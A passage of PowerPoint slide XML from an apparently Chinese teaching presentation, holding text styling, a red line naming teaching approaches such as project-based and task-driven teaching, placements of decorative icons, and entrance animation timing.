            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
